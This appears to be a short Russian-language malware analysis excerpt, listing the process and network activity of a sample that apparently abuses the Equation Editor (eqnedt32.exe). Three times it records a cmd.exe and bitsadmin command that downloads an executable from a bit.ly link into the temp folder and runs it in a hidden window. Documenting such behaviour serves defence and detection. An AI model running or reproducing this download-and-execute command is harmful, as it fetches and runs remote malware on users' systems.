Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download https://bit.ly/2NEbpES %temp%\Nw.Exe&%temp%\Nw.Exe
- 'bi#.ly':443
- DNS ASK bi#.ly
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download https://bit.ly/2NEbpES %temp%\Nw.Exe&%temp%\Nw.Exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 /download https://bit.ly/2NEbpES %TEMP%\Nw.Exe